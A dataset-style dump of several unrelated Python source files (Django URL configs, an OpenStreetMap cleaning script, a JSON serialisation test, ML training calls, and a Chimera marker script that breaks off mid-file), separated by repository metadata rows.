                logger.info(u'计费缓存数据清理失败,%s, 下次执行还需等待 %s' % (repr(err), self.format_time(next_interval)), trace='task')
                logger.exception(err)
        return next_interval
# Register this task with the daemon's task-class registry.
taskd.TaskDaemon.__taskclss__.append(ClearBillingTask)
"sailorhdx@hotmail.com"
] | sailorhdx@hotmail.com |
69414aca6d4d7f0cb5c489d05b25bfc88edba856 | 360a4d5f59a346cec88a5660f2ad464104cb33d3 | /core/urls.py | fdb19830a72d392abb68ebaab202ad3aa517c084 | [] | no_license | kanakan12/airbnb-clone | 48c340f0c7a1f7c35edeb212db81018c5643d663 | 384d02f60d0c80f6c4260a4d7e99ad371ec6d38d | refs/heads/master | 2023-05-04T02:08:19.632764 | 2021-05-25T05:11:22 | 2021-05-25T05:11:22 | 357,159,105 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 211 | py | from django.urls import path
from rooms import views as room_views
# URL namespace for reverse() lookups, e.g. reverse("core:home").
app_name = "core"
urlpatterns = [
    # path("", room_views.all_rooms, name="home")
    # Site root, served by the class-based HomeView from the rooms app.
    path("", room_views.HomeView.as_view(), name="home")
]
"69573636+kanakan12@users.noreply.github.com"
] | 69573636+kanakan12@users.noreply.github.com |
6855129c3297167e5e28f1fd6651378c6bd5b025 | 1370b1061ea2790eef64631f16773e024f8b8133 | /main.py | ad9c7483a1e8ded4b387d34e9671e13190aeed79 | [] | no_license | cbbeyer/reflection | 8d3cdaf16a36627a32e24ef1161748c08784799e | 6a6668248bfcdb2cafd3416d9064bdbe235a6eac | refs/heads/master | 2021-07-25T11:44:44.649474 | 2017-11-04T23:37:48 | 2017-11-04T23:37:48 | 109,190,053 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,813 | py | #!/usr/bin/env python3
from serialize import to_json
import sys
################################################
### Testing objects
class Date(object):
    """A simple calendar date (year, month, day) attached to a person."""
    def __init__(self, year, month, day):
        # Store the three components as same-named attributes.
        self.year, self.month, self.day = year, month, day
class Franchise(object):
    """A franchise with a name, an owner, and a start date."""
    def __init__(self, name, owner, started):
        # Keep each constructor argument as a same-named attribute.
        for attr, value in (('name', name), ('owner', owner),
                            ('started', started)):
            setattr(self, attr, value)
class Person(object):
    """A person, optionally linked to parents and a franchise."""
    def __init__(self, name, gender, birth_date, is_cool, net_worth,
                 debut_year, father, mother, franchise):
        # Mirror every constructor argument onto the instance in one shot.
        vars(self).update(
            name=name,
            gender=gender,
            birth_date=birth_date,
            is_cool=is_cool,
            net_worth=net_worth,
            debut_year=debut_year,
            father=father,
            mother=mother,
            franchise=franchise,
        )
################################################
### Main method
if __name__ == '__main__':
    # person 1
    fd1 = Date(1962, 8, 1)
    f1 = Franchise('Spiderman', 'Marvel', fd1)
    b1 = Date(2011, 2, 3)
    p1 = Person('Peter "Spidey" Parker', 'M', b1, False, 15000.00, 1967, None, None, f1)
    # person 2
    fd2 = Date(1962, 8, 1)
    f2 = Franchise('Superman', 'DC\\Comics', fd2)
    b2 = Date(2014, 5, 6)
    p2 = Person('Lois Lane', 'F', b2, True, 40000.50, 1981, None, None, f2)
    # person 3: has both parents and a franchise, so serializing it
    # exercises the nested-object path of to_json().
    fd3 = Date(1963, 1, 1)
    f3 = Franchise('Doctor Who', 'BBC', fd3)
    b3 = Date(2017, 8, 9)
    p3 = Person('River Song/Melody Pond', 'F', b3, True, 91234.56, 2001, p1, p2, f3)
    # Write the serialized object to output.json.  Using print's file
    # argument instead of reassigning sys.stdout means stdout is never left
    # redirected if to_json() raises.
    with open('output.json', 'w') as f:
        print(to_json(p3), file=f)
| [
"carsen.beyer@gmail.com"
] | carsen.beyer@gmail.com |
b42572225b6714e3c6f166c62dd809cea5271184 | db855555dddc1f17dc3d5784dbb6f68683fb7175 | /tf_experiments/train_setting_03.py | f130ed2a2c5a607510f6bb76b5f8fba4b4b7af5b | [] | no_license | moligslagers/cnn_server | 063f67c449df8b1e5ab4802e241bd10646ad7ce1 | 6f63b1c7eace1b2b857f3186ed044c2245bf56d4 | refs/heads/master | 2023-04-22T10:41:37.223390 | 2017-07-27T12:19:40 | 2017-07-27T12:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 826 | py | from tf_experiments import train_setting_from_scratch as train_from_scratch, \
train_setting_from_imagenet as train_from_imagenet, train_setting_from_cars as train_from_cars
# Bots covered by experiment setting 03.  NOTE(review): this list is not
# referenced below; the bot names are repeated literally in each call.
bots_setting_03 = ['cars', 'bmw_models', 'car_types', 'seasons']
# One-hour training runs for setting 03, per bot and per initialization
# strategy (from the 'cars' checkpoint, from ImageNet weights, or from
# scratch).  Commented-out calls were skipped for this experiment run.
# train_from_cars.train(3, 'cars', hours=1)
# train_from_imagenet.train(3, 'cars', hours=1)
train_from_scratch.train(3, 'cars', hours=1)
# train_from_cars.train(3, 'bmw_models', hours=1)
train_from_imagenet.train(3, 'bmw_models', hours=1)
train_from_scratch.train(3, 'bmw_models', hours=1)
train_from_cars.train(3, 'car_types', hours=1)
train_from_imagenet.train(3, 'car_types', hours=1)
train_from_scratch.train(3, 'car_types', hours=1)
train_from_cars.train(3, 'seasons', hours=1)
train_from_imagenet.train(3, 'seasons', hours=1)
train_from_scratch.train(3, 'seasons', hours=1)
| [
"m.olig03@googlemail.com"
] | m.olig03@googlemail.com |
74c031d50cf1150eebc7a3381046b4a41296f3e0 | c211a0d57508d2e9168f73c9f3aa8b19bb54e582 | /hummingbot/connector/exchange/dolomite/dolomite_utils.py | 71b6c6de4c1be75f0f3caa04faf1360c4ee17d30 | [
"Apache-2.0"
] | permissive | pulkitsharma/hummingbot | 106ccd3226b082458e7ae279050ebcfbd182f7df | 8695f83a2ffec392083be9ba5be7f0fa5c4dade6 | refs/heads/master | 2022-12-28T19:28:54.430850 | 2020-10-15T04:08:53 | 2020-10-15T04:08:53 | 275,738,351 | 0 | 0 | Apache-2.0 | 2020-09-10T07:16:26 | 2020-06-29T05:24:59 | Python | UTF-8 | Python | false | false | 76 | py | CENTRALIZED = False
# Sample trading pair for this connector; presumably shown to users when
# configuring it — confirm against the connector framework.
EXAMPLE_PAIR = "WETH-DAI"
# Default fee schedule; presumably [maker, taker] rates — confirm against
# how the framework consumes DEFAULT_FEES.
DEFAULT_FEES = [0, 0.00001]
| [
"victoreni14@gmail.com"
] | victoreni14@gmail.com |
929b88b5412eb718ec7eb9135f8243b831c66224 | a7c43fe60985bcd0c21eb5d95cefd98a6924375e | /accounts/urls.py | f2e0aa8ecdfccb58b540c37fc81a85e47515dafb | [] | no_license | SoumyaRanjanNaik/TimeTableGenerationHelper | 1cb3c13fe8ca610f57796ab0f067676bc14a2cc9 | a76724bd095cee9e1b68e460b1ae4701fb54ea1f | refs/heads/master | 2022-10-23T04:10:52.230928 | 2020-06-16T19:48:00 | 2020-06-16T19:48:00 | 272,745,926 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 578 | py | from django.contrib import admin
from django.urls import path
from accounts.views import *
# URL routes for the accounts app; names are used for reverse() lookups.
urlpatterns = [
    # path("home/", home, name="home"),
    path("faculty_login/", faculty_login, name="faculty_login"),
    # Fixed typo in the route string ("facu;ty_page/" -> "faculty_page/");
    # the reverse() name was already correct and is unchanged.
    path("faculty_page/", faculty_page, name="faculty_page"),
    path("add_faculty/", add_faculty, name="add_faculty"),
    path("faculty_logout/", faculty_logout, name="faculty_logout"),
    path("admin_login/", admin_login, name="admin_login"),
    path("admin_logout/", logout_view, name="admin_logout"),
    path("free_list/", free_list, name="free_list"),
]
| [
"srnaik2209@gmail.com"
] | srnaik2209@gmail.com |
12b2ae2377bb9545426fbd1e3fb3a467ac40bf0b | ae6893601b505f0df6014c95d657bfbff854f059 | /pasta-django/cursos/admin.py | 6f63640cbd0046ede2be71af35b92745af46a970 | [
"MIT"
] | permissive | rabeloalcantaraigor/Curso-API-DRF | ff439ec302a740ec6c69e6ae1e274e91bdbfc99f | df613423539a451c67b041b9d606e4525f0b798b | refs/heads/main | 2023-07-17T06:51:14.865047 | 2021-09-02T14:00:04 | 2021-09-02T14:00:04 | 402,443,816 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 355 | py | from django.contrib import admin
from .models import Curso, Avaliacao
@admin.register(Curso)
class CursoAdmin(admin.ModelAdmin):
    """Admin options for Curso: columns shown in the change-list page."""
    list_display=('titulo', 'url','criacao','atualizacao','ativo')
@admin.register(Avaliacao)
class AvaliacaoAdmin(admin.ModelAdmin):
    """Admin options for Avaliacao: columns shown in the change-list page."""
    list_display=('curso','nome','email','avaliacao','criacao','atualizacao','ativo')
"37155572+rabeloalcantaraigor@users.noreply.github.com"
] | 37155572+rabeloalcantaraigor@users.noreply.github.com |
491d5db8ca46cee613f835831794a720469c3134 | 434566b26b8da70c7eb516f42843d0cad6fb1d24 | /gfe/urls.py | b0fbc060a17667ab9bc750e67737b99ac5bf3ec9 | [
"BSD-3-Clause",
"CC-BY-3.0",
"CC-BY-2.0",
"MIT"
] | permissive | OpticPotatOS/gfesys | 3e27af6eacdfde92695beb67a4d1b114aa13f8ed | 4415e523ba8d1c546c55dd01ccf18baa0bc8f950 | refs/heads/master | 2021-01-17T05:35:57.150499 | 2016-05-27T08:38:19 | 2016-05-27T08:38:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,996 | py | from django.conf.urls import patterns, include, url
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
from django.views.generic.base import RedirectView
from page import views
from surlex.dj import surl
from server import views as server_views
# Site-wide URL routing table (legacy Django <=1.7 ``patterns()`` style).
urlpatterns = patterns('',
    # Examples:
    # url(r'^$', 'gfe.views.home', name='home'),
    # url(r'^blog/', include('blog.urls')),

    # --- Core site sections -------------------------------------------------
    url(r'^$', include('server.urls')),
    url(r'^forum', include('spirit.urls')),
    url(r'^servers/', include('server.urls', namespace='server')),
    url(r'^members/', include('member.urls', app_name="member")),
    url(r'^admin/', include(admin.site.urls)),
    # Surlex route overriding the default newsletter archive detail view.
    surl(
        '^newsletter/<newsletter_slug:s>/archive/<year:Y>/<month:m>/<day:d>/<slug:s>/$',
        server_views.SubmissionArchiveDetailOverrideView.as_view(), name='newsletter_archive_detail_override'
    ),
    url(r'^newsletter/', include('newsletter.urls')),

    # --- Favicon / touch-icon redirects -------------------------------------
    # Browsers request these assets at the site root; each is permanently
    # redirected to its actual location under the static files tree.
    url(r'^apple-touch-icon-57x57\.png$', RedirectView.as_view(url='/static/servers/favicons/apple-touch-icon-57x57.png', permanent=True)),
    url(r'^apple-touch-icon-60x60\.png$', RedirectView.as_view(url='/static/servers/favicons/apple-touch-icon-60x60.png', permanent=True)),
    url(r'^apple-touch-icon-72x72\.png$', RedirectView.as_view(url='/static/servers/favicons/apple-touch-icon-72x72.png', permanent=True)),
    url(r'^apple-touch-icon-76x76\.png', RedirectView.as_view(url='/static/servers/favicons/apple-touch-icon-76x76.png', permanent=True)),
    url(r'^apple-touch-icon-114x114\.png$', RedirectView.as_view(url='/static/servers/favicons/apple-touch-icon-114x114.png', permanent=True)),
    url(r'^apple-touch-icon-120x120\.png$', RedirectView.as_view(url='/static/servers/favicons/apple-touch-icon-120x120.png', permanent=True)),
    url(r'^apple-touch-icon-144x144\.png$', RedirectView.as_view(url='/static/servers/favicons/apple-touch-icon-144x144.png', permanent=True)),
    url(r'^apple-touch-icon-152x152\.png$', RedirectView.as_view(url='/static/servers/favicons/apple-touch-icon-152x152.png', permanent=True)),
    url(r'^apple-touch-icon-180x180\.png$', RedirectView.as_view(url='/static/servers/favicons/apple-touch-icon-180x180.png', permanent=True)),
    url(r'^apple-touch-icon-precomposed\.png$', RedirectView.as_view(url='/static/servers/favicons/apple-touch-icon-precomposed.png', permanent=True)),
    url(r'^apple-touch-icon.png$', RedirectView.as_view(url='/static/servers/favicons/apple-touch-icon.png', permanent=True)),
    url(r'^favicon-32x32\.png$', RedirectView.as_view(url='/static/servers/favicons/favicon-32x32.png', permanent=True)),
    url(r'^favicon-96x96\.png$', RedirectView.as_view(url='/static/servers/favicons/favicon-96x96.png', permanent=True)),
    url(r'^android-chrome-36x36\.png$', RedirectView.as_view(url='/static/servers/favicons/android-chrome-36x36.png', permanent=True)),
    url(r'^android-chrome-48x48\.png$', RedirectView.as_view(url='/static/servers/favicons/android-chrome-48x48.png', permanent=True)),
    url(r'^android-chrome-72x72\.png$', RedirectView.as_view(url='/static/servers/favicons/android-chrome-72x72.png', permanent=True)),
    url(r'^android-chrome-96x96\.png$', RedirectView.as_view(url='/static/servers/favicons/android-chrome-96x96.png', permanent=True)),
    url(r'^android-chrome-144x144\.png$', RedirectView.as_view(url='/static/servers/favicons/android-chrome-144x144.png', permanent=True)),
    url(r'^android-chrome-192x192\.png$', RedirectView.as_view(url='/static/servers/favicons/android-chrome-192x192.png', permanent=True)),
    url(r'^favicon-16x16\.png$', RedirectView.as_view(url='/static/servers/favicons/favicon-16x16.png', permanent=True)),
    url(r'^manifest\.json$', RedirectView.as_view(url='/static/servers/favicons/manifest.json', permanent=True)),
    url(r'^safari-pinned-tab\.svg$', RedirectView.as_view(url='/static/servers/favicons/safari-pinned-tab.svg', permanent=True)),
    url(r'^mstile-70x70\.png$', RedirectView.as_view(url='/static/servers/favicons/mstile-70x70.png', permanent=True)),
    url(r'^mstile-144x144\.png$', RedirectView.as_view(url='/static/servers/favicons/mstile-144x144.png', permanent=True)),
    url(r'^mstile-150x150\.png$', RedirectView.as_view(url='/static/servers/favicons/mstile-150x150.png', permanent=True)),
    url(r'^mstile-310x150\.png$', RedirectView.as_view(url='/static/servers/favicons/mstile-310x150.png', permanent=True)),
    url(r'^mstile-310x310\.png$', RedirectView.as_view(url='/static/servers/favicons/mstile-310x310.png', permanent=True)),
    url(r'^favicon\.ico$', RedirectView.as_view(url='/static/servers/favicons/favicon.ico', permanent=True)),
    url(r'^browserconfig\.xml$', RedirectView.as_view(url='/static/servers/favicons/browserconfig.xml', permanent=True)),

    # --- Auth and catch-all -------------------------------------------------
    url(r'^oauth/', include('oauth2_provider.urls', namespace='oauth2_provider')),
    # Catch-all: must stay last so it does not shadow the routes above.
    url(r'', include('page.urls', app_name="page", namespace='page')),
) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| [
"magnusjjj@gmail.com"
] | magnusjjj@gmail.com |
aa5ff303cb84f6f6e95af2b35f407decfb78eade | 265051f7cb4e7cd41ba1e4736da154249c93adbd | /laguage/apps.py | 19669f01921fba9aa2807ed58f7dbcaf43f281d5 | [] | no_license | GeofreyMuindeMunguti/zilo-api | af2945b2a2df1cda3d75ae8e179a699633bfbc59 | f3f5512ce0bb397d51ef243e1fd92bd1e2ed7e68 | refs/heads/master | 2023-07-05T09:54:57.115316 | 2021-03-29T22:07:09 | 2021-03-29T22:07:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 89 | py | from django.apps import AppConfig
class LaguageConfig(AppConfig):
    """App configuration for the ``laguage`` Django app."""
    # NOTE(review): "laguage" looks like a typo for "language", but this value
    # must match the app's package directory name, so it is left unchanged.
    name = 'laguage'
| [
"muinde@mesozi.com"
] | muinde@mesozi.com |
7076a30dc510f868334a16834814d2a9d186743b | 7d7e44e1a040311ed0e77149c25fa506018a7814 | /2_clean_osm_write_csv.py | c049496b7517d6fffa00637a75f373a6c03030d2 | [] | no_license | PetzMcPetz/Data_Wrangling | a97c9ca70669e95d0e0422f8028d56bee8678e31 | 2702f84eb0c8788faf5a4a8eac33237e2fc8bb47 | refs/heads/main | 2023-03-25T18:43:47.100896 | 2021-03-23T22:10:41 | 2021-03-23T22:10:41 | 350,870,911 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,249 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 18 23:03:59 2021
@author: Michael Rabe
"""
import xml.etree.ElementTree as ET # Use cElementTree or lxml if too slow
from collections import defaultdict
import re
import pprint
import csv
import codecs
import cerberus
import add_help_functions as helper
# --- Module-level configuration and lookup tables ----------------------------
# Wikipedia page listing Berlin's administrative districts; used to build a
# mapping from locality/sub-district names back to district names, which is
# then reversed for value -> canonical-name lookups.
wiki_path = 'https://de.wikipedia.org/wiki/Verwaltungsgliederung_Berlins#Bezirke'
berlin_dict = helper.get_berlin_district_names(wiki_path)
berlin_dict = helper.reverse_dict(berlin_dict)
# Scraping the cuisine values from the OSM wiki is disabled; a hand-written
# cuisine_mapping further below is used instead.
#wiki_path ="https://wiki.openstreetmap.org/wiki/DE:Key:cuisine"
#cuisine_dict = helper.get_cuisine_values(wiki_path)
#cuisine_dict = helper.reverse_dict_v2(cuisine_dict)
import add_schema
osm_schema = add_schema.get_schema()  # cerberus schema for shaped elements
# Full extract is processed by default; the k20 sample file is kept for testing.
#OSMFILE = "Berlin_OSM_v2_k20.osm"
OSMFILE = "Berlin_OSM_v2.osm"
# Tag-key patterns: lowercase "type:key" style keys, and keys containing
# characters that would be problematic in the output CSVs/database.
lower_colon = re.compile(r'^([a-z]|_)+:([a-z]|_)+')
problemchars = re.compile(r'[=\+/&<>;\'"\?%#$@\,\. \t\r\n]')
# Output CSV file names and the column order used by each DictWriter below.
NODES_PATH = "nodes.csv"
NODE_TAGS_PATH = "nodes_tags.csv"
WAYS_PATH = "ways.csv"
WAY_NODES_PATH = "ways_nodes.csv"
WAY_TAGS_PATH = "ways_tags.csv"
NODE_FIELDS = ['id', 'lat', 'lon', 'user', 'uid', 'version', 'changeset', 'timestamp']
NODE_TAGS_FIELDS = ['id', 'key', 'value', 'type']
WAY_FIELDS = ['id', 'user', 'uid', 'version', 'changeset', 'timestamp']
WAY_TAGS_FIELDS = ['id', 'key', 'value', 'type']
WAY_NODES_FIELDS = ['id', 'node_id', 'position']
###############################################################################
def get_type_and_key(entry):
    """Split a raw OSM tag key into a (type, key) pair.

    Only the first colon splits, so "addr:street" yields ("addr", "street")
    and "a:b:c" yields ("a", "b:c").  Keys without a colon get the default
    type "regular" and are returned unchanged as the key.
    """
    prefix, separator, remainder = entry.partition(":")
    if separator:
        return (prefix, remainder)
    return ('regular', entry)
###############################################################################
def is_suburb_name(elem):
    """Return True when *elem* carries the "addr:suburb" tag key."""
    return elem.attrib['k'] == "addr:suburb"
def upd_suburb(inp_dict, value):
    ''' function to harmonize "addr:suburb" values
    :param inp_dict: reversed berlin dictionary extracted from wiki
    :param value: is the "addr:suburb" value
    :return: the canonical district name, or the original value (with a
        console note) when it is not present in the mapping
    '''
    try:
        value = inp_dict[value]
    except KeyError:
        # Bug fix: this was a bare ``except``, which would also swallow
        # unrelated errors (e.g. an unhashable value); only a missing key
        # is expected here.
        print ("value not found:",value)
    return value
###############################################################################
# Hand-written mapping from canonical cuisine names to the alias spellings
# observed in the data; it is reversed below so lookups go alias -> canonical.
cuisine_mapping = { "coffee_shop": ["coffee"],
                    "barbecue":['bbq'],
                    "arab":["arabic"],
                    "israeli":['isreali'],
                    "italian":['italian_pizza'],
                    "burrito":['burritos']
                    }
# alias -> canonical name, as consumed by upd_cuisine().
cuisine_dict = helper.reverse_dict_v2(cuisine_mapping)
def is_cuisine(elem):
    """Return True when *elem* carries the "cuisine" tag key."""
    key = elem.attrib['k']
    return key == "cuisine"
def upd_cuisine(inp_dict, value):
    ''' function to harmonize "cuisine" values
    :param inp_dict: cuisine_dict > reversed cuisine_mapping dict
        (alias -> canonical cuisine name)
    :param value: the raw "cuisine" tag value, e.g. "bbq; pizza"
    :return: list of canonical cuisine names, first-occurrence order kept
    Step1: Split value in a list by semicolon and strip whitespace
    Step2: Map every entry through inp_dict to its canonical spelling
    Step3: Drop entries that duplicate an earlier (normalized) entry

    Bug fix: the previous implementation popped items out of the list while
    indexing over a precomputed range(len(...)), which raised IndexError for
    inputs such as "bbq;barbecue"; building a fresh result list avoids that
    and also deduplicates consistently.
    '''
    normalized = []
    for entry in value.split(";"):  # Step1
        entry = entry.strip()
        canonical = inp_dict.get(entry, entry)  # Step2: fall back to raw entry
        if canonical not in normalized:  # Step3
            normalized.append(canonical)
    return normalized
###############################################################################
def shape_element(element):
    """Shape an OSM "node" or "way" XML element into the dict-of-rows form
    expected by the CSV writers in process_map().

    Returns {'node': ..., 'node_tags': ...} for nodes and
    {'way': ..., 'way_nodes': ..., 'way_tags': ...} for ways; implicitly
    returns None for any other element tag.
    """
    node_attribs = {}
    way_attribs = {}
    way_nodes = []
    tags = []
    store_dict={}
    # Attributes that must be coerced to int/float; everything else stays str.
    format_list_int = ['id', 'changeset', 'uid']
    format_list_float = ['lat', 'lon']
    for key in element.attrib.keys():
        if key in format_list_int:
            store_dict[key]=int(element.attrib[key])
        elif key in format_list_float:
            store_dict[key]=float(element.attrib[key])
        else:
            store_dict[key]=str(element.attrib[key])
    counter = 0
    for child in element:
        if child.tag == "tag":
            entry_key = child.attrib['k']
            entry_value = child.attrib['v']
            # Skip tags whose key contains problematic characters entirely.
            if problemchars.search(entry_key):
                print (entry_value, "found")
                continue
            # Split "type:key" style keys into separate type and key fields.
            entry_type, entry_key = get_type_and_key(entry_key)
            # Harmonize suburb names against the Berlin district mapping.
            if is_suburb_name(child):
                entry_value = upd_suburb(berlin_dict, entry_value)
            loop_list=[entry_value]
            # A "cuisine" tag may expand to several cleaned values.
            if is_cuisine(child):
                loop_list = upd_cuisine(cuisine_dict, entry_value)
            for entry_value in loop_list:
                tags.append({"id": store_dict['id'],
                                "key": entry_key,
                                "value":entry_value ,
                                "type":entry_type})
        elif child.tag == "nd":
            # Way members: record each referenced node id with its position.
            node_id = int(child.attrib['ref'])
            way_nodes.append({'id': store_dict['id'],
                              'node_id': node_id,
                              'position': counter})
            counter+=1
    if element.tag == 'node':
        node_attribs = store_dict
        return {'node': node_attribs, 'node_tags': tags}
    elif element.tag == 'way':
        way_attribs=store_dict
        return {'way': way_attribs, 'way_nodes': way_nodes, 'way_tags': tags}
###############################################################################
def validate_element(element, validator, schema=osm_schema):
    """Raise an Exception if *element* does not match *schema*.

    :param element: shaped element dict as produced by shape_element()
    :param validator: a cerberus.Validator instance
    :param schema: cerberus schema to validate against (default: osm_schema)
    """
    if validator.validate(element, schema) is not True:
        # Bug fix: ``dict.iteritems()`` is Python 2 only and raised
        # AttributeError under Python 3; report the first failing field.
        field, errors = next(iter(validator.errors.items()))
        message_string = "\nElement of type '{0}' has the following errors:\n{1}"
        error_string = pprint.pformat(errors)
        raise Exception(message_string.format(field, error_string))
###############################################################################
def process_map(osm_file, validate):
    """Iteratively parse *osm_file* and write shaped node/way data to the
    five CSV files configured at module level.

    :param osm_file: path to the OSM XML file to process
    :param validate: when True, validate each shaped element against
        ``osm_schema`` with cerberus before writing it out
    """
    with codecs.open(NODES_PATH, 'w',encoding='utf-8') as nodes_file, \
         codecs.open(NODE_TAGS_PATH, 'w',encoding='utf-8') as nodes_tags_file, \
         codecs.open(WAYS_PATH, 'w',encoding='utf-8') as ways_file, \
         codecs.open(WAY_NODES_PATH, 'w',encoding='utf-8') as way_nodes_file, \
         codecs.open(WAY_TAGS_PATH, 'w',encoding='utf-8') as way_tags_file:

        nodes_writer = csv.DictWriter(nodes_file, NODE_FIELDS)
        node_tags_writer = csv.DictWriter(nodes_tags_file, NODE_TAGS_FIELDS)
        ways_writer = csv.DictWriter(ways_file, WAY_FIELDS)
        way_nodes_writer = csv.DictWriter(way_nodes_file, WAY_NODES_FIELDS)
        way_tags_writer = csv.DictWriter(way_tags_file, WAY_TAGS_FIELDS)

        nodes_writer.writeheader()
        node_tags_writer.writeheader()
        ways_writer.writeheader()
        way_nodes_writer.writeheader()
        way_tags_writer.writeheader()

        elem_list=["node","way"]
        validator = cerberus.Validator()

        for event, element in ET.iterparse(osm_file, events=("end",)):
            if element.tag in elem_list:
                el = shape_element(element)
                if el:
                    # Bug fix: validation previously ran unconditionally -
                    # the ``validate`` flag was ignored and a stray ``None``
                    # statement sat inside the if-branch.
                    if validate is True:
                        validate_element(el, validator)
                    if element.tag == 'node':
                        nodes_writer.writerow(el['node'])
                        node_tags_writer.writerows(el['node_tags'])
                    elif element.tag == 'way':
                        ways_writer.writerow(el['way'])
                        way_nodes_writer.writerows(el['way_nodes'])
                        way_tags_writer.writerows(el['way_tags'])
if __name__ == '__main__':
    #test()
    # Process the full extract with cerberus validation enabled.
    process_map(OSMFILE, validate=True)
"petz@quantentunnel.de"
] | petz@quantentunnel.de |
cb680713f62e5a02875dde5bcc3b991f790d8eea | 711756b796d68035dc6a39060515200d1d37a274 | /output_cog/optimized_8955.py | 527f9c63569aea386912716fa659f2f8a46cb7f2 | [] | no_license | batxes/exocyst_scripts | 8b109c279c93dd68c1d55ed64ad3cca93e3c95ca | a6c487d5053b9b67db22c59865e4ef2417e53030 | refs/heads/master | 2020-06-16T20:16:24.840725 | 2016-11-30T16:23:16 | 2016-11-30T16:23:16 | 75,075,164 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,839 | py | import _surface
import chimera
try:
import chimera.runCommand
except:
pass
from VolumePath import markerset as ms
try:
from VolumePath import Marker_Set, Link
new_marker_set=Marker_Set
except:
from VolumePath import volume_path_dialog
d= volume_path_dialog(True)
new_marker_set= d.new_marker_set
marker_sets={}
surf_sets={}
if "Cog2_GFPN" not in marker_sets:
s=new_marker_set('Cog2_GFPN')
marker_sets["Cog2_GFPN"]=s
s= marker_sets["Cog2_GFPN"]
mark=s.place_marker((494.355, 367.125, 618.791), (0.89, 0.1, 0.1), 18.4716)
if "Cog2_0" not in marker_sets:
s=new_marker_set('Cog2_0')
marker_sets["Cog2_0"]=s
s= marker_sets["Cog2_0"]
mark=s.place_marker((530.442, 401.486, 572.52), (0.89, 0.1, 0.1), 17.1475)
if "Cog2_1" not in marker_sets:
s=new_marker_set('Cog2_1')
marker_sets["Cog2_1"]=s
s= marker_sets["Cog2_1"]
mark=s.place_marker((583.34, 432.922, 517.736), (0.89, 0.1, 0.1), 17.1475)
if "Cog2_GFPC" not in marker_sets:
s=new_marker_set('Cog2_GFPC')
marker_sets["Cog2_GFPC"]=s
s= marker_sets["Cog2_GFPC"]
mark=s.place_marker((588.793, 296.393, 548.012), (0.89, 0.1, 0.1), 18.4716)
if "Cog2_Anch" not in marker_sets:
s=new_marker_set('Cog2_Anch')
marker_sets["Cog2_Anch"]=s
s= marker_sets["Cog2_Anch"]
mark=s.place_marker((687.495, 547.315, 400.156), (0.89, 0.1, 0.1), 18.4716)
if "Cog3_GFPN" not in marker_sets:
s=new_marker_set('Cog3_GFPN')
marker_sets["Cog3_GFPN"]=s
s= marker_sets["Cog3_GFPN"]
mark=s.place_marker((526.348, 391.42, 595.607), (1, 1, 0), 18.4716)
if "Cog3_0" not in marker_sets:
s=new_marker_set('Cog3_0')
marker_sets["Cog3_0"]=s
s= marker_sets["Cog3_0"]
mark=s.place_marker((526.158, 391.048, 596.895), (1, 1, 0.2), 17.1475)
if "Cog3_1" not in marker_sets:
s=new_marker_set('Cog3_1')
marker_sets["Cog3_1"]=s
s= marker_sets["Cog3_1"]
mark=s.place_marker((519.373, 404.513, 620.584), (1, 1, 0.2), 17.1475)
if "Cog3_2" not in marker_sets:
s=new_marker_set('Cog3_2')
marker_sets["Cog3_2"]=s
s= marker_sets["Cog3_2"]
mark=s.place_marker((545.248, 413.559, 613.651), (1, 1, 0.2), 17.1475)
if "Cog3_3" not in marker_sets:
s=new_marker_set('Cog3_3')
marker_sets["Cog3_3"]=s
s= marker_sets["Cog3_3"]
mark=s.place_marker((570.959, 401.07, 613.637), (1, 1, 0.2), 17.1475)
if "Cog3_4" not in marker_sets:
s=new_marker_set('Cog3_4')
marker_sets["Cog3_4"]=s
s= marker_sets["Cog3_4"]
mark=s.place_marker((585.251, 393.25, 637.761), (1, 1, 0.2), 17.1475)
if "Cog3_5" not in marker_sets:
s=new_marker_set('Cog3_5')
marker_sets["Cog3_5"]=s
s= marker_sets["Cog3_5"]
mark=s.place_marker((582.632, 397.261, 666.569), (1, 1, 0.2), 17.1475)
if "Cog3_GFPC" not in marker_sets:
s=new_marker_set('Cog3_GFPC')
marker_sets["Cog3_GFPC"]=s
s= marker_sets["Cog3_GFPC"]
mark=s.place_marker((498.909, 388.009, 602.56), (1, 1, 0.4), 18.4716)
if "Cog3_Anch" not in marker_sets:
s=new_marker_set('Cog3_Anch')
marker_sets["Cog3_Anch"]=s
s= marker_sets["Cog3_Anch"]
mark=s.place_marker((660.452, 407.68, 740.286), (1, 1, 0.4), 18.4716)
if "Cog4_GFPN" not in marker_sets:
s=new_marker_set('Cog4_GFPN')
marker_sets["Cog4_GFPN"]=s
s= marker_sets["Cog4_GFPN"]
mark=s.place_marker((712.029, 522.925, 582.455), (0, 0, 0.8), 18.4716)
if "Cog4_0" not in marker_sets:
s=new_marker_set('Cog4_0')
marker_sets["Cog4_0"]=s
s= marker_sets["Cog4_0"]
mark=s.place_marker((712.029, 522.925, 582.455), (0, 0, 0.8), 17.1475)
if "Cog4_1" not in marker_sets:
s=new_marker_set('Cog4_1')
marker_sets["Cog4_1"]=s
s= marker_sets["Cog4_1"]
mark=s.place_marker((683.896, 528.04, 584.816), (0, 0, 0.8), 17.1475)
if "Cog4_2" not in marker_sets:
s=new_marker_set('Cog4_2')
marker_sets["Cog4_2"]=s
s= marker_sets["Cog4_2"]
mark=s.place_marker((656.119, 521.256, 581.863), (0, 0, 0.8), 17.1475)
if "Cog4_3" not in marker_sets:
s=new_marker_set('Cog4_3')
marker_sets["Cog4_3"]=s
s= marker_sets["Cog4_3"]
mark=s.place_marker((631.645, 506.27, 579.738), (0, 0, 0.8), 17.1475)
if "Cog4_4" not in marker_sets:
s=new_marker_set('Cog4_4')
marker_sets["Cog4_4"]=s
s= marker_sets["Cog4_4"]
mark=s.place_marker((609.496, 487.603, 579.55), (0, 0, 0.8), 17.1475)
